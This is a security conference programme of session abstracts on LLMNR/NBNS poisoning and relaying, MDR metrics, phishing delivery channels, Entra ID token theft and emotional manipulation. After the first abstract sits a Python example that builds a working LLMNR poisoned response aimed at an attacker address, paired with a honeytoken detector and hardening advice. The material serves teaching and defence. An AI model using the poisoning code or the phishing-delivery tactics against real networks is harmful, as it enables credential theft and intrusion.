One of the very first offensive actions carried out by an attacker with access to an internal network is to attempt to exploit the LLMNR, mDNS or NBNS protocols, which are still enabled by default today, in order to gain an authenticated foothold in the Active Directory infrastructure.
To the pentesters thinking that local name resolution attacks are well-known exploit primitives that do not have any more surprises in store for us: this presentation is here to prove you wrong. We will dive into two new techniques recently introduced that enhance the NTLM and Kerberos relaying capabilities of local name resolution poisoning, and their implementation in open-source tools such as Responder and krbrelayx.
Discover how to trick Windows SMB clients into falling back to WebDAV HTTP authentication, which does not implement signing, or how to perform Kerberos relaying through LLMNR, all illustrated by concrete exploit demonstrations!
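The poisoning primitive the talk builds on fits in a few dozen lines, which is worth seeing once to understand both the attack and its cheapest detection. The code below is an added example of my own, not Responder's or krbrelayx's code: it builds the LLMNR query a Windows client multicasts when DNS cannot resolve a name, parses it, constructs the poisoner's answer pointing the name at an attacker IP, and finally implements the honeytoken check a defender runs (query a name that does not exist; anyone who answers is a poisoner). Wire format is the DNS-style layout of RFC 4795; all names and addresses are constructed.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port
FLAG_RESPONSE = 0x8000                           # QR bit; the C/TC/T bits stay clear here


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def decode_name(buf, off):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:                       # compression pointers: not expected in LLMNR queries
            raise ValueError("compressed name")
        labels.append(buf[off:off + n].decode())
        off += n


def build_query(txid, name, qtype=1):
    """What a client multicasts after DNS fails for e.g. a mistyped share host (A query)."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_message(pkt):
    """Parse a query or a response; A-record rdata is rendered as dotted quad."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == 1 and rdlen == 4 else rdata))
    return {"txid": txid, "flags": flags, "questions": questions, "answers": answers}


def build_poisoned_response(query, attacker_ip, ttl=30):
    """The poisoner's reply: echo the question, claim the name, point it at attacker_ip.
    The victim then connects there and offers NTLM/Kerberos authentication to relay."""
    q = parse_message(query)
    name, qtype, qclass = q["questions"][0]
    header = struct.pack(">HHHHHH", q["txid"], FLAG_RESPONSE, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack(">HH", qtype, qclass)
    answer = encode_name(name) + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def is_poisoner_reply(probe_name, reply, trusted_ips=()):
    """Honeytoken check: a probe for a name that does not exist should get no answer,
    so any A record for it from an untrusted source means someone answers for everything."""
    m = parse_message(reply)
    return bool(m["flags"] & FLAG_RESPONSE) and any(
        name.lower() == probe_name.lower() and rtype == 1 and ip not in trusted_ips
        for name, rtype, _ttl, ip in m["answers"])


if __name__ == "__main__":
    q = build_query(0x1234, "fileserver01")          # constructed: name nobody owns
    r = build_poisoned_response(q, "10.0.0.66")       # constructed attacker address
    print(parse_message(r))
    print("poisoner on the segment:", is_poisoner_reply("fileserver01", r))
```

Sending the probe means a UDP socket to `224.0.0.252:5355` and a short listen for replies; schedule it from a few endpoints per VLAN and you have a detector that Responder-style tooling cannot avoid tripping, because answering everything is the whole point of it. The fix the talk's relaying techniques make urgent is the old one: turn off multicast name resolution and NetBIOS over TCP/IP by policy, require SMB signing, and (for the WebDAV fallback) disable the WebClient service where nothing needs it.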
In today’s cybersecurity landscape, organizations are under constant pressure to defend against evolving threats. As a result, many turn to Managed Detection and Response (MDR) providers, who often promise peace of mind through glowing dashboards and polished Key Performance Indicators (KPIs). But behind the marketing sheen lies a critical question: Are these KPIs actually providing value?
This session will unpack the illusion of comfort that many MDR vendors create by highlighting surface-level metrics — response time, alert volume, SLA compliance — that often resonate with executives but fail to reflect operational reality. We’ll explore the disconnect between boardroom optics and SOC floor effectiveness, emphasizing that KPIs must be more than impressive — they must be actionable.
Attendees will walk away with a critical lens for evaluating cybersecurity KPIs, a framework for identifying metrics that drive real security outcomes, and a renewed focus on tracking what truly matters in the fight against modern threats.
Phishing isn’t dead, but relying on email alone doesn't cut it anymore.
Spam filters are smarter than ever. Domain reputation matters. Content is scanned and scored. Automated tools scan domains as soon as a TLS certificate is requested for them, since Certificate Transparency logs make every issuance public. Most phishing emails never even make it to the inbox because of automated scanners. And when they do, users are trained to be suspicious.
In this workshop, we’ll start by looking at email, which is still the most common channel for phishing. You’ll see the increasingly ridiculous hoops attackers have to jump through just to get a single message into a user’s inbox: from domain aging and sender reputation to anti-bot detection, client-side obfuscation and spam filter scoring. It’s a game of constant trial and error. We will then focus on other ways to deliver your messages through alternative, unfiltered channels such as Microsoft Teams, QR codes, SMS, LinkedIn or shared documents.
Participants will work with real-world personas to build convincing pretexts using OSINT, and then decide how they would deliver their phishing message. If email looks too risky or unlikely to succeed, you’ll explore alternative channels like Teams, SMS, LinkedIn, or even QR codes. The goal is to think like an attacker, adapt to defenses, and figure out how the message gets through.
Key Takeaways:
- Understand why phishing via email is harder than ever and what modern filters look for
- Learn the steps attackers take to bypass spam detection and deliver a single message
- Use open source intelligence to craft realistic, targeted phishing pretexts
- Explore the importance of timing, trust signals, and context in social engineering
- Compare multiple delivery channels beyond email and assess their trade-offs
- Think like an attacker when planning phishing campaigns, and identify where defenses can fail
- Gain practical insight into how phishing simulations can be made more realistic and impactful
Token Theft attacks have risen during the past few years as organisations have moved to stronger authentication methods. Entra ID has built-in protections to mitigate these attacks. This session will cover how to use these protections and technical details of how they work under the hood.
In an era of information warfare, social engineering is no longer limited to isolated phishing emails. It’s about overwhelming minds. From misinformation to algorithmic overload, cyber professionals today face a new form of threat: emotional hijack. In this session, former intelligence officer and behavioral analyst An Gaiser unpacks how this invisible attack vector works, and how it hijacks more than just attention.
Using real-world examples from counter-terrorism, security screening, and AI-driven profiling systems, An reveals how "flooding the zone" disables our critical thinking and activates deep behavioral responses (fight, flight, freeze, affiliate). We will explore how this impacts decision-making in cybersecurity teams, especially in moments of ambiguity or pressure.
This talk challenges common assumptions in the security field, including outdated emotion recognition models still used in AI tools, and offers a grounded framework for detecting, interpreting, and de-escalating emotional flooding, both in ourselves and others.
Expect a mix of behavioral science, real-world intelligence cases, and practical takeaways you can use in your daily work. Whether you're a red teamer probing human error, a blue teamer navigating stress signals, or a leader seeking clarity in chaos: this session will give you a new lens to detect the invisible and stay cognitively sharp under pressure.
This keynote will explore not only why we need to become more digitally independent, but also how on earth we can make that happen.
Closing of the conference